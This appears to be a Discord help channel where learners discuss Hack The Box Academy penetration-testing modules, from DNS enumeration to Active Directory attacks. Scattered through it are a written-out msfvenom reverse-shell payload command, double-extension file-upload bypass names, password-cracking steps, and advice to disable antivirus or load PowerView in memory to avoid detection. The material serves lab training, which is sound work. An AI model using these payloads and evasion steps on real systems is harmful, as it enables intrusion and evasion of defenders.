#modules

1 messages ยท Page 146 of 1

distant moat
#

thank you payloadbunny

plain coral
#

Run a UDP scan in NMAP and review the SNMP section of the module

fathom pendant
red void
#

Hi guys, has anyone done Zephyr pro lab ?

fathom pendant
sly dome
#

server is expecting a .gif but the data inside of the file is not a gif

#

maybe try swapping the extensions

lean jackal
#

looking for help on Attacking Common Applications - Attacking Tomcat the Login Brute Force part. I tried with python and metasploit as showed in the module but am not able to get working credentials. What am I missing here?

sly dome
#

you did not try what i said ๐Ÿคท

fathom pendant
#

File.png.phtml

#

Instead of file.phtml.png

tame ivy
#

ohh thanks u guys, it worked, idk i tried this on other sections and it worked, so i was stuck there, thanks sir

sly dome
#

any time

naive wadi
#

That was a BRUTAL skill assessment but great

grizzled schooner
#

Does anyone have a second for DNS enumeration help

naive wadi
grizzled schooner
#

ok gotcha, I haven't used this before sorry

Need help enumerating FQDN of IP x.x.x.203

used dig axfr internal.inalenfreight.htb @10.129.136.250 to get SOA's

sly dome
#

subsubdomains exist

#

also you gonna need bruteforce for that one

sudden blaze
#

@grizzled schooner you mean this question: Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.

grizzled schooner
#

no, one second, and is there a reason that the syntax I just posted got erased?

grizzled schooner
#

only returned 1 answer which was a 127.0.0.1

fathom pendant
spiral pelican
#

Hey. someone had finish the module malware analysis and can help me with the skill part ? ๐Ÿ˜…

fathom pendant
grizzled schooner
#

Marcie, could you give me another nudge? I feel like I've tried everything and I am honestly just lost

fathom pendant
#

You're meant to use the bruteforce tool

grizzled schooner
#

dnsenum right?

fathom pendant
#

Yes

spiral pelican
grizzled schooner
#

I've tried posting the syntax, but it just gets removed so it isn't much help lol

grizzled schooner
#

||can I use this to post the syntax then||

fathom pendant
#

try ยฏ_(ใƒ„)_/ยฏ

grizzled schooner
#

I've tried using ||dnsenum --dnsserver 10.129.136.250 --enum -p 0 -s 5 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --threads 90 inlanefreight.htb and have subbed the wordlists as well||

fathom pendant
#

You're just looking at the main domain

#

The f* wordlist is the correct wordlist

spiral pelican
#

i cant find the domain *

fathom pendant
grizzled schooner
fathom pendant
grizzled schooner
#

don't they have to be SOA though?

fathom pendant
#

No

spiral pelican
grizzled schooner
#

oh okay, I thought they did, I will keep trying then, thanks

fathom pendant
#

soa is just a record

#

The A record points to other subdomains

tame ivy
#

Module:FIle Upload Attacks
Section:Skills Assessment
Have bypassed everything and found a directory, but cannon find a magic byte, tried everything but cannot get last thing
do anyone have a nudge?

fathom pendant
#

SOA is just info on that domain zone

grizzled schooner
#

have ran that ||dnsenum|| syntax and substituted ||x.inlinefreight.htb|| with all of the options that I was given, and nothing was returned due to ||NS record query failed||

fathom pendant
#

Literally just be patient

#

Also inlanefreight, not inlinefreight

grizzled schooner
#

yeah sorry typed that out wrong, but it just returns me to run new syntax, it doesn't keep running

fathom pendant
#

You shouldn't need to do anything with threads

grizzled schooner
#

I did change that and took that out when I ran the list of subdomains that I got, but I'm not getting anything

fathom pendant
#

Your list of sudomains is probably wrong

grizzled schooner
#

I don't know how to upload a picture and add the spoiler, can I pm it to you

fathom pendant
#

Also for some reason you're doing -s 5?

#

I just checked @grizzled schooner the example they give you with the wordlist won't give you the full list of subdomains

rustic sage
fathom pendant
#

.png.extension also bypasses as the server only sees the .png part and passes it

rustic sage
#

Yep

tulip coral
#

Good Afternoon im having an issue with windows Prive Escalation - Windows Privilage users , any assitance would be useful

lyric tendon
#

Hy

#

Is someone can help me

tulip coral
fathom pendant
orchid pine
#

for anyone who use ligolo-ng for pivoting how do u guys change the port for the intial connectio 11601

acoustic owl
orchid pine
#

thank you payload

#

so helpfu;

digital junco
#

Guys

#

give me some help here:

#

question: Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.

#

module: Nmap

fathom pendant
digital junco
#

I alredy did this

fathom pendant
#

Tbh this one is a bit of a pain with your own vm, pwnbox gives the answer like 99% of the time

digital junco
#

and nc all the open ports

fathom pendant
#

Sometimes you need to reset the box a few times

digital junco
#

and even use tcpdum

fathom pendant
digital junco
#

tcpdump*

#

-p-

#

yes sir

#

I look at this with all my resources

#

and nothing happen

#

I found one port 31337

fathom pendant
digital junco
#

I look at and nothing too

rustic sage
fathom pendant
digital junco
#

I use the --packet-trace and look

#

and after use tcpdump too and look again

digital junco
rustic sage
fathom pendant
#

Also, if you're doing tcpdump are you specifying tun0 as the interface?

fathom pendant
#

But yeah just gotta wait

digital junco
#

Zzz

#

got it

fathom pendant
#

Patience is a key virtue in this field

digital junco
#

Thank you @fathom pendant I would kiss you but you are so far away

fathom pendant
#

Don't

#

That's weird

digital junco
#

on the face of course

fathom pendant
#

Still don't

digital junco
#

alright. I don't

rustic sage
digital junco
rustic sage
#

I'm kidding

digital junco
#

in my country it is a sign of friendship

#

and love as well

rustic sage
fathom pendant
#

I understand that, I'm just not a fan of people being near my face

high reef
#

hey all need some help

#

i'm doing the intro to brute forcing

#

section login forms

#

but the page isn't loading

acoustic owl
fathom pendant
#

^

#

Might need to reset target

high reef
#

yea it was a reset but i just started the dumb thing

buoyant void
#

So I'm doing the Windows File Transfer Module and I'm wondering something about this question:

"Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer."

It seems to be asking that we upload the zip file to the target Windows machine before you RDP into the machine and if that's the case I'm a bit stuck. I easily got the question answered by RDP into the machine first then simply downloading the zip from my attack host, but now I'm wondering if I was supposed to somehow upload it to the target without being in control of the Windows machine. If that's what I was supposed to do, any tips on how to upload the file to the Windows target without first RDP into it?

sharp sentinel
#

I need help with question at the last of this section from the module "intro to bash scripting"

#

error reading input file

i get this error every time

quick magnet
#

are u try .phar in last extension ?

fading oracle
#

shell.phar%20.jpg

#

it uploads but doesnt execute

quick magnet
#

it double ext right ?

fading oracle
#

yes

quick magnet
fading oracle
#

i didnt

#

should i?

sly dome
fading oracle
#

I tried and it didnt

#

Tried swapping too

sly dome
#

works for me

fading oracle
#

Hmm

#

after resetting 5 times it worked lol

sly dome
#

sure !

kindred rune
#

Greetings everyone. I'm current working on 'Intro to Assembly' assessment task 1. After decoding the shellcode on stack, I found it contains many memory related operations where registers get dereferenced with default value 0, which leads to memory accesses to address closed to 0 and therefore result in segfault. I don't think manually mmap a memory page at the lower addresses are possible solutions as mmap syscall will randomly allocated a memory trunk at higher address if the provided address is 0. So, there might be a context or a special environment where the shellcode should execute. Any hints on this?

covert sierra
#

Did anyone went through "Introduction to Digital Forensics" and completed Skills Assessments?
Did you had to download additional tools beside the ones that come with the machine???

woven copper
kindred rune
amber cliff
#

i'm stuck on value fuzzing. i can get the right ID# but my curl command only outputs i don't have access to that flag.

#

can anyone help me with that one?

tulip coral
#

Hey Goodnight Im having an issues with windows priv SeDebugPrivelege can someone assist me

finite night
#

Currently doing shells and payloads module > bind shell, trying to bind a bash shell in the server so i can connect from client, but im not able to use commands, all i can do is send messages. what am i doing wrong?

tidal kelp
#

Often when I rdp to Windows hosts , I end up with this:
any neat trick to avoid this?

#

have tried different resolutions

hallow kiln
tidal kelp
#

lol

#

thanks

fiery berry
kindred rune
# kindred rune Thanks for the reply. My current solution xors the 14 qwords one by one with the...

Unfortunately, none of the above mentioned attemps work. I've replied to a forum post with details of my approach. I hope it would provide more information on why I got stuck ยฏ_(ใƒ„)_/ยฏ

tidal kelp
#

ON module AD / ACl Abuse tactics - I've been able to obtain the hash for said user. however when I try to crack it offline with hashcat I get ' no hash loaded'. Am I formatting the Hash file wrong?

#

nvm stupid question, seems like there was some line breaks added

blazing pelican
#

Hello there ! I've been struggling on the machine that I have to hack in the Getting Started module, where you have to use metasploit and exploitdb to find a way to break through a sample WordPress website. I did find the WordPress version, but I have no clue on how to find the specific plugins used on the site in order to find a fitting exploit. Furthermore, while searching on exploitdb using searchsploit, I only found a few exploits associated with this version of WordPress, which were correlated with plugins which don't seem to be on this particular site. I also tried doing some page / directory enumeration using gobuster without much success... Can someone give me a tip on how I'm supposed to find the plugin that I will use to break through ? Thanks in advance for your help ๐Ÿ™‚

quasi jungle
#

https://academy.hackthebox.com/module/144/section/1256
Managed to get question 1 and 2
But now the target is bugged even after I reset
I can't do 3

โ”Œโ”€[eu-academy-1]โ”€[10.10.15.11]โ”€[htb-ac-1018999@htb-ybrut9267e]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ dig ns inlanefreight.htb @10.129.42.195

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> ns inlanefreight.htb @10.129.42.195
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5763
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: ef5f3e49c6957c4201000000653b70557fbd4ce90b9be825 (good)
;; QUESTION SECTION:
;inlanefreight.htb. IN NS

;; ANSWER SECTION:
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.

;; ADDITIONAL SECTION:
ns.inlanefreight.htb. 604800 IN A 127.0.0.1

;; Query time: 6 msec
;; SERVER: 10.129.42.195#53(10.129.42.195) (UDP)
;; WHEN: Fri Oct 27 09:09:56 BST 2023
;; MSG SIZE rcvd: 107

โ”Œโ”€[eu-academy-1]โ”€[10.10.15.11]โ”€[htb-ac-1018999@htb-ybrut9267e]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ dig axfr ns.inlanefreight.htb @10.129.42.195

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> axfr ns.inlanefreight.htb @10.129.42.195
;; global options: +cmd
; Transfer failed.

acoustic owl
rustic sage
#

anyone able to remind me of IMAPS syntax?

#

|| im doing footprinting hard and ive found the credentials for tom and im logged in the IMAPS service and can see the mailboxes and i wanna list all emails under important but i cannot do it ||

#

for 1 FETCH <ID> is the ID just the mailbox name?

rustic sage
#

dayum that was first

#

thanks payloadbunny ๐Ÿ™‚

rustic sage
#

woooo!

#

that was a fun module

acoustic owl
# blazing pelican up

This Question?
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

#

If so, take a look at the source code of the website. Then you will surely find a plugin which you can attack. Maybe use ||wpscan||

blazing pelican
river aspen
#

Why could all all be marked as error? It is the Burp Intruder chapter.

brave sail
#

In the WINDOWS PRIVILEGE ESCALATION - Pillaging part, the exercises goes through a cookie editing part at slack.com. There's no internet access however, is this on purpose? It's specified to access slack through the spawned windows instance.

blazing pelican
# acoustic owl If so, take a look at the source code of the website. Then you will surely find ...

after using the tool you suggested, I found no plugin whatsoever, which leaves me on a dead end :/ I tried exploiting it via XML-RPC by trying the only exploit I could find on metasploit related to it, but it did not lead to anywhere... I really feel like I'm missing something obvious there, given that it's supposed to be one of the very first modules to do as a beginner. Any clue ? Thanks for your help btw

acoustic owl
#

Don't get discouraged. You can do it ๐Ÿ’ช

solar grove
#

Can someone who has finished the shell and payload module help?

#

I've spent hours trying to hack host1, but I can't find it.

brave sail
blazing pelican
# acoustic owl Think about how the site makes a backup

so it was indeed obvious ahahah, right under my nose ! I found the exploit we're supposed to use on this machine and ended up with a big list of file adresses, but I don't get how I'm supposed to use this information since no matter how I write the url, it doesn't load anything. Am I supposed to connect to the site using ssh or with some GET http request ?

#

(exemples of such file/directory adresses)

acoustic owl
cedar void
fathom pendant
cedar void
#

Section 1319

fathom pendant
#

The name is more helpful

cedar void
#

Passwd, Shadow & Opasswd

fathom pendant
#

You did the credential hunting in linux section yes?

tidal kelp
#

on the AD module / ACL . We go through both how to take over accounts and updating there password as well as utilizing DCSync to dump hashes and tickets.
In a real life scenario would the ladder to be preferred?

cedar void
cedar void
#

*they want

fathom pendant
#

This section has you reuse credentials you find

#

It's best to save them in a file

tidal kelp
#

ok, reason why I ask I in the section after 'privilged access' you are asked to reset the password

rustic sage
#

Hey everyone, I'm stuck on the Live Engagement of the Shells and Payloads module. I've RDP'ed into the jump box and managed to complete the first few questions. The problem I have run into is the only browser I seem to have available is Links2. Links doesn't seem to be rendering most of the blog page, I can see a form in the html that isn't being rendered. Am I off in left field? Am I supposed to fix Links or did I miss a browser, or is there another path I'm not thinking of entirely?

rustic sage
supple patio
rustic sage
supple patio
rustic sage
supple patio
#

xd

rustic sage
limber widget
#

Module: RDP and SOCKS Tunneling with SocksOverRDP
Link: https://academy.hackthebox.com/module/158/section/1439

Problem:
Im following the steps in the module per usual, however no matter which version of SocksOverRDPx64.zip I download, once I extract the files, the windows vm that I am RDP'd into as htb-student, automatically deteles the .dll file needed.

I already checked the Windows Security settings and it is showing as disabled. Am I suppose to figure out how to bypass windows security without even doing a module related to that yet? Or is this an error.

fiery berry
limber widget
fiery berry
sly dome
#

go to security under settings and disable real-time protection

limber widget
sly dome
#

simple

limber widget
#

windows security app shows its disabled, but Get-MpComputerStatus shows true

sly dome
#

its not the same !

#

real-time protection is the actual AV

limber widget
#

ohhhh

sly dome
#

weird name, but Microsoft is built different

limber widget
#

I see, thanks!

sly dome
#

any time

fiery berry
sly dome
#

more hacky

#

haha

abstract vapor
#

Hi everyone, im just doing Active Directory Enumeration and Attack module, there is Powershell Module PowerView.ps1 but every time i am downloading it my bitdefender is detecting it and then deleting, so what is the purpose of this powershell module if any AntiViruse can detect and prevent it? how it can be used during Penetration Testing process?

sly dome
#

disable the AV kek

abstract vapor
#

haha ๐Ÿ˜„

sly dome
#

i mean, you have command execution you can disable it

#

but also loading it in memory should work

#

with IEX

#

instead of downloading on drive

abstract vapor
abstract vapor
supple patio
supple patio
#

but here's the example

sly dome
rustic sage
#

if you're doing the path in order you should've learned this

#

and it's highly recommended to do it in order

sly dome
#

probably lacking notes :S

supple patio
#

(

rustic sage
#

probably

abstract vapor
sly dome
#

before

#

order

rustic sage
#

are you doing the pen testing / CPTS path?

#

if so, you already learned this.

abstract vapor
#

no im just doing this module "Active Directory Enumeration & Attacks"

rustic sage
#

right

#

but are you just doing that module randomly? or are you doing it because you're on the pentesting job role path?

supple patio
sly dome
#

yes

abstract vapor
hallow kiln
#

the problem is that the module expects a good understanding of a lot of things before you do it, file transfers, pivoting, enumeration, common services, etc.

rustic sage
sly dome
#

also it is stated in the module description

hallow kiln
#

totally possible to have learned those things elsewhere of course

#

look into running script in memory, adding exclusion folders and disabling AV

abstract vapor
#

thank you guys for answering

hallow kiln
#

it's just a few commands in powershell, but they're important

cedar void
#

I can't look at the /etc/shadow because will doesn't have the permissions to look at the contents of that directory. I switched to kiras user and tried looking at the contents of the /etc/shadow directory and also was unable to. I tried editing the /etc/passwd contents by removing 'x' (since the module stated that if I removed 'x' , I could go to 'root's directory without being prompted for a password and I also had issues editnig the content of that /etc/passwd directory.

https://academy.hackthebox.com/module/147/section/1319

autumn pilot
#

wrong approach

river aspen
hallow kiln
sly dome
#

enum is key as usual

solar grove
#

Can someone who has finished the shell and payload module help?

hallow kiln
#

ask your question

solar grove
#

can't find a reverse shell suitable for hacking host01

hallow kiln
#

lol, you already know which host that is

solar grove
#

msfvenom I tried for 8 hours but no result.

sly dome
sly dome
solar grove
#

I have tried almost all of apache tomcat and smb payloads, the result is that I cannot establish a connection

#

I need to add a reverse shell to the apache server with a java programming language, but after adding it, I listen to it and there is no result.

rustic sage
#

send your msfvenom command and what you're doing to catch the shell

abstract vapor
# sly dome probably lacking notes :S

is sharing notes normal thing here? im just new and i dont know sorry ๐Ÿ™‚ if you can share notes i would be grateful but if not, sorry for asking

solar grove
#

I can't take a photo because I'm on the bus.

sly dome
#

you will be totally lost on my notes

#

xD

solar grove
#

@rustic sage multi handler

rustic sage
hallow kiln
solar grove
#

@hallow kilnyes

rustic sage
sly dome
#

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war

#

you run this, you upload it, you visit it

solar grove
#

there is a start stop button also clicked

hallow kiln
sly dome
hallow kiln
#

I don't even remember that button

solar grove
#

@sly domeI've used this one, but it didn't work.

hallow kiln
#

it definitely works

sly dome
abstract vapor
warm drift
#

please can anyone help with file uploads module whitelist filters section?

sly dome
solar grove
#

Yes, I uploaded it there.

#

@sly dome LHOST 172.16.1.5 right ?

sly dome
#

wrong

#

your tun0 ip

hallow kiln
#

LHOST is your own IP

hallow kiln
#

tun0 like Rafa said

sly dome
solar grove
#

I'll try again from the beginning. I'll be back.

#

ty <#

sly dome
#

your error is just wrong IP

warm drift
sly dome
sly dome
#

which step are you at?

abstract vapor
#

@sly dome can i dm you?

warm drift
# sly dome i know, but be more specific

I have ran intruder with some upload files names with payload content being a php script to print hello world but I keep getting File not found when I try to access one time I got Forbidden

sly dome
sly dome
#

Forbidden = you are trying to get into the wrong path

warm drift
#

but in says it uploaded in burpsuite

sly dome
#

probably wrong path

abstract vapor
sly dome
#

check the page source and you will see the path

sly dome
cedar void
warm drift
sly dome
#

one way to do it is using base64, another is using simple HTTP server

cedar void
sly dome
#

with wget in my opinion

#

nix01 has python3

#

from nix01: python3 -m http.server
from your host: wget <nix01's IP>:8000/passwd.bak

sly dome
#

1st bypass blacklist, when you done with it -> bypass whitelist

#

can be done manually

warm drift
sly dome
#

yes

#

it does

warm drift
#

but it doesnt output anything

#

just blank white screen

sly dome
#

which extension?

warm drift
#

this is the view source file name is just ".jpg" or ".png" changes depending on wat I upload

sly dome
#

.jpg or .png is not gonna get interpreted as php by the server

warm drift
#

||shell.php/.png|| is what I uploaded

sly dome
#

1st you need a php extension that doesnt get blacklisted

sly dome
#

dont do it with intruder

warm drift
#

thought we need character injection?

sly dome
#

that does not work with modern php

#

1st try simple things

#

try upload .php -> you will get blacklist warning

#

try another php's extensions until you get the whitelist warning

#

from there try to bypass it

warm drift
sly dome
#

any time bro

sterile pumice
#

Hello,

just doing Login Form Attacks question "Using what you learned in this section, try attacking the '/login.php' page to identify the password for the 'admin' user. Once you login, you should find a flag. Submit the flag as the answer. ". I used Hydra and found .....Every time another password.
Any idea?

Best regards
Christian

acoustic owl
hallow kiln
sterile pumice
#

will begin again with this question,, verify all again and come back later ๐Ÿ™‚ Was just questioning why each time i run Hydra against the login.php page it gives me another password. Was thinking as if i have wrong command it will not find anything it ,

hallow kiln
#

it behaves weirdly when the command is incorrect, it could output that every password is correct for example

sterile pumice
#

But it found me only one password each time, and each time another but with the same format (very similar) at some character differences. Will check all again my command

hallow kiln
#

double-check everything, reset the target just to be sure, if it doesn't work, post your command and we can see what's up, then you can just delete once it's solved so it's not sitting as a full spoiler

#

the mode is just incorrect

#

I wouldn't use chatgpt for this

cedar void
hallow kiln
hallow kiln
# cedar void ha!

oh and another thing, use the mutated password list, I think I saw rockyou there

cedar void
#

oh okay

sterile pumice
#

Update: you were right there was a mistyping in my command. Worked good now

lethal shard
#

hello!

i'm doing the Advanced SQL Injection Module. Task 1. I found the blind vulnerability in ||/api/v1/check-user|| endpoint. And im exploiting it. I can extract the email value like||admin@pass2.htb|| or usernames, but I cannot extract the password, because something blocking to extract from ||password|| column. other columns like email, username works properly. Maybe im missing something((

swift oxide
#

hello

#

Detecting Windows Attacks with Splunk - I just enrolled on this where I can access sa the splunk lab?

solar grove
#

@hallow kiln hello again I did what you said, I uploaded my payload file (shell.war) tomcat in the same way but I can't get a back connection

swift oxide
#

all good

cedar void
hallow kiln
hallow kiln
solar grove
#

@hallow kiln absurdly after 10 minutes the connection came up . lol

#

@hallow kilnThank you for your help. โค๏ธ

hallow kiln
#

glad it worked!

halcyon sphinx
#

Hi All. Can someone help me with lateral movement in the "Attacking Enterprise Networks" module. I have followed the steps to escalate privileges to administrator. But I get the following error:C:\Windows\system32>รพ
'รพ' is not recognized as an internal or external command, operable program or batch file.

I have used the same command provided in the material of that section. Including the full path to net.exe produces the same error message. Trying to execute a command like "whoami" results in the same error message.

I need help understanding what is going on. Thanks.

Solved: Check the encoding of pwn.bat

iron plaza
#

In the module for Kerberos Attack - Kerberoasting from Linux (module/25/section/830) it asks to find Adam's password but when I use GetNPUsers.py I only get ||amber.smith jenna.smith carole.rose|| is there something wrong with the section?

hallow kiln
iron plaza
#

yea but in the section it showed how to use GETNPUsers to list kerbaroastable accounts

#

but the list i got didnt have adam

#

which si what the question is looking for

#

oh damn it

#

i made a big booboo

#

kek what an idiot

hallow kiln
#

GetUserSPNs?

blazing pelican
# blazing pelican (exemples of such file/directory adresses)

Ok so after more digging the only exploit I found on metasploit related to ||simple-backup|| (which I presume is the plugin that we're supposed to breach through) is the following : ||wp_simple_backup_file_read.rb|| which only gives me a full list of directory and user adresses like the ones I posted before. I tried looking for other exploits in other DBs such as exploitDB which brought me the following link : ||https://www.exploit-db.com/exploits/39883||, but it seems that the exploit is not compatible for the version used on the box as none of its vulnerabilities worked, at least for me. In summary, I'm not gonna lie, I'm really getting frustrated about this one as I just cannot find a way to breach through it even though it's supposed to be introductory... Can someone pls confirm that I'm searching exploits on the right plugins and if so, what is the name of the exploit I'm supposed to use, because I can't find more than one exploit on metasploit about this plugin. Thanks in advance for your help !

crimson walrus
#

Hello guys, I am doing skills assessment 1 for the Windows Priv Esc module. The current user has the impersonate priv and I want to use juicy potato or print spoofer to get a revshell as system. However, I get errors with both. I suspect with juicypotato the problem could be the CLSID and I have been trying different values but it still doesn't work. Some CLSIDs iniate teh connection but its not a real shell aka I cannot issue commands. Anyone know about this problem?

blazing pelican
tidal kelp
#

On AD Module I just completed the session for Bleeding Edge Vulnerabilities and Miscellaneous Misconfigurations a lot of usefull stuff in these. Except for the boxes recommended in the end of Module . Are there a way to look up boxes where you could practice these exploits?

#

(Or if anyone have any recommendations)

rustic sage
#

Can somebody give me a hunt at skills assessment - using web proxies iยดm at Q3
i dont understand how i can fuzz and encode the the cookie in one step with burp

tulip coral
queen timber
#

Hello Hello, Im kinda new to all this stuff.
ATM Im doing the footprinting module and I'm stuck at the MSSQL Server Login... with the user I already found to login via RDP, I Can't log into the MSSQL Server

fiery berry
fiery berry
# tulip coral

ok, mmm... I have used the second command shown with Get-Process anyway I'm going to quickly spawn the lab and see what's going on

gentle coral
#

E * Can potentially gather username structure from OSINT.

queen timber
# sly dome section?

What you mean exactly? I'm at the end, there are 3 maschines easy,medium and hard im currently stucked a the Module Footprinting medium maschine

fathom pendant
supple patio
fiery berry
tulip coral
chrome moth
#

Hello, can someone help me with Intro to Assembly Language Skills Assessment? I'm having troubles in the second question...

fiery berry
queen timber
fathom pendant
sly dome
#

find a suspicious table

queen timber
sly dome
#

right click and edit 200 entries

fathom pendant
#

The footprinting section isn't really expecting you to know any sql commands

#

(Attacking common services later on goes over sql commands, for both mssql and mysql

hasty solar
#

hi Im doing ntlmrelay attacks section ntlm relay over SMB attacks and when i execute ntlmrelayx i receive the following error, does anyone know whats happening thanks in advance ```root@ubuntu:/home/htb-student/tools/impacketv11/impacket/examples# python3 ntlmrelayx.py
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[] Protocol Client HTTPS loaded..
[
] Protocol Client HTTP loaded..
[] Protocol Client SMTP loaded..
[
] Protocol Client SMB loaded..
[] Protocol Client RPC loaded..
[
] Protocol Client MSSQL loaded..
[] Protocol Client DCSYNC loaded..
[
] Protocol Client IMAP loaded..
[] Protocol Client IMAPS loaded..
[
] Protocol Client LDAP loaded..
[] Protocol Client LDAPS loaded..
[
] Running in reflection mode
Traceback (most recent call last):
File "ntlmrelayx.py", line 482, in <module>
c = start_servers(options, threads)
File "ntlmrelayx.py", line 189, in start_servers
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record)
TypeError: setLDAPOptions() takes 12 positional arguments but 13 were given

queen timber
fathom pendant
#

Mysql and mssql though have different commands

queen timber
#

But how can I look into the tables itself? Via GUI I mean

hasty solar
fathom pendant
fiery berry
# tulip coral Yes that is the correct thing i have the same

There is a commint made two days ago, now to run it would be:

PS C:\users\jordan> .\psgetsys.ps1; ImpersonateFromParentPid -ppid 5748 -command "c:\windows\system32\cmd.exe"
[+] Got Handle for ppid: 5748
[+] Updated proc attribute list
[+] Starting c:\windows\system32\cmd.exe ...True - pid: 4832 - Last error: 122
PS C:\users\jordan>
supple patio
tulip coral
#

thank you will check it out

queen timber
tame ivy
#

Module:Password Attacks
Section:Password Reuse / Default Passwords
Tried every password for every use, also tried find a default creds for mysql but didnt find it in google, says that there is no default password and u need to set a password, could anyone help me pls?

fathom pendant
fathom pendant
#

It is in fact there I just checked

tame ivy
#

thanks guys

fathom pendant
sudden blaze
#

Module:Pivoting Section:SSH for Windows with plink.exe ---- has anyone tried this?

sudden blaze
#

@naive wadi did you get it working....

rustic sage
#

I figured it out

fathom pendant
#

Because it's only expecting the ntlm part

#

Also remove the hash as it's still a spoiler

fathom pendant
# blazing pelican up

The file read is correct. Look at all the options again and think about what can be changed to give you the right answer

#

The file read exploit worked and gave you a specific file

#

But you can specify a different one

blazing pelican
fathom pendant
#

It's a specific linux file

blazing pelican
fathom pendant
#

But that file isn't important AT all

#

If you keep trying to dig into it, you're just gonna hit a rabbit hole of nonsense

#

It's an intro module so it's gonna be simple

tame ivy
#

Module:Password Attacks
Section:Credential Hunting in Linux
Just have a question, do i need to bruteforce kira? bcs i have creds for sam user and im logged in...

fathom pendant
#

Actually no I think at this point you should already have her creds

#

Wait I'm dumb

#

Sorry it's been a minute

fathom pendant
#

That's the point of this

#

And wills creds aren't in the password list AFAIK

tame ivy
#

thanks for answer sir

fathom pendant
#

There's a reason the hint tells you another user

tame ivy
#

do i need mutate "||LoveYou1",||(the hint) or just use mutated version of password.list?

fathom pendant
tame ivy
fathom pendant
#

It doesn't necessarily take that long if you brute force a service like ftp or any other service than ssh

fathom pendant
#

Also using an appropriate amount of threads like -t 48 will speed it up

tame ivy
fathom pendant
#

The skills assessments do test you on EVERYTHING :) and when you get to one of them use the discord search feature as there's been plenty of links on it

fathom pendant
tame ivy
naive wadi
naive wadi
tame ivy
fathom pendant
tame ivy
#

๐Ÿ‘ FeelsBadMan

sly dome
#

cat mutated | grep '^L'

fathom pendant
sly dome
#

not needed

fathom pendant
#

Sometimes grep doesn't play nice with regex

sly dome
#

for start with or end with it works

fathom pendant
#

I've had to add -e to a lot of my grep regex stuff with ^ or $

sly dome
#

try it yourself ๐Ÿคท

fathom pendant
#

I have

sly dome
#

me too

fathom pendant
sly dome
#

it works

fathom pendant
#

I'd also prefer to just use -e as a habit

sly dome
#

ofc

peak condor
#

Hey I'm new to infosec type stuff here, the most I've done remotely relating to this is Android pentesting/rooting, web crawlers, and recently started helping with reversing iMessage (Pypush). Where do I start?

thorn urchin
#

By reading #welcome because this chat is for module discussion not general questions

peak condor
#

this is the channel most resembling a #general channel

#

also I did

thorn urchin
#

No it isnt and no you didnt because your name is still white

#

You need to verify your account to access the rest of the server including #general

peak condor
#

Well I don't have an account yet

thorn urchin
#

Welp

#

sounds like a personal problem

fathom pendant
#

It takes at most 5 minutes

peak condor
#

Right well, thanks I guess

thorn urchin
#

np will gladly answer the question in #general once you get access

sterile epoch
#

Hi I am in the metasploit module meterpreter section I have done a scan and it reveals a smb, rdp and iis service I tried finding an exploit using the search option I tried using eternal blue and romance but they did not work the parameters I provided are in the snapshot. I would like to request some direction as I seem to be stuck.

#

any help please

fathom pendant
#

It helps to show the error it gives you

#

Also running test helps

sterile epoch
#

you mean the auxilaries right?

fathom pendant
#

No I mean just running test or check

#

After setting options

#

Type check and hit enter

sterile epoch
#

well I ran these

#

I will try the test option

fathom pendant
#

Reset target

sterile epoch
#

ok

#

its still the same

arctic junco
#

@sterile epoch - I dont think that is the right payload

#

I just ran it and worked first try

sterile epoch
#

the other service I noticed was a httpd 10.0

#

did a search nothing popped

arctic junco
#

you don't need to port scan

sterile epoch
#

ok thanks for the hint

tame ivy
#

Password Attacks:
hello again guys huh, is there maybe issues with machine? copied via scp a files, did ushadow passwd.bak shadow.bak, and tried with paswordlist, mutated passwordlist and it cannot find a password, tried with rockyou.txt but it holds too long and my pc will fking explode i think, checked also a search feature in discord and didnt find anything useful, did someone know where is my bad?

fathom pendant
#

Instead of doing the whole list

sly dome
#

it is on mutated one

#

if you are using hashcat

#

you cant use the unshadow format

#

i suggest you to check hashcat modes

fathom pendant
#

You can

#

It's just a pain

sly dome
fathom pendant
#

Hashcat would have thrown an error

sly dome
#

you have to remove some stuff from here @tame ivy

fathom pendant
#

You're kinda spoiling that hash my guy

#

You have a really bad habit of doing that when you're trying to help

tame ivy
#

well it cracked, result:exhausted was for other users, stupid thing, why it didnt print a cracked users, and just typed exhausted, i checked the output "-o cracked.hashes" and there was a password...

sly dome
#

its not an skill assessment i dont care actually

fathom pendant
#

It's still a spoiler lol

sly dome
#

exhausted is not cracked

fathom pendant
#

As part of the task is getting it in the first place

sly dome
#

k i remove it

#

dont cry

fathom pendant
#

Not crying lol, trying not to have you get thwacked by a mod

tame ivy
#

yeah i know, but in passwd and shadow thing was 4 users, i tried for 4 users instead for root only, and root was cracked, hashcat just didnt printed it

fathom pendant
#

They actually do care

#

:p

sly dome
#

i've seen here A LOT of spoilers

#

not even removed or warned by a single mod

#

dont act plz

fathom pendant
#

๐Ÿ™„

tame ivy
#

guys thanks for help, but please don't be angry at each other

sly dome
#

we aren't

supple patio
#

Seems like it's funny now

fathom pendant
#

Spoilers are spoilers, if it's for a t0 module usually mods don't care as much as its fundamental

sterile epoch
arctic junco
#

You don't need to scan it is not the Nmap module

sterile epoch
#

then how will I knw what exploit to use

supple patio
sterile epoch
#

sorry my machine timed out and I did not save the results in my local machine but its not different from any fast scan

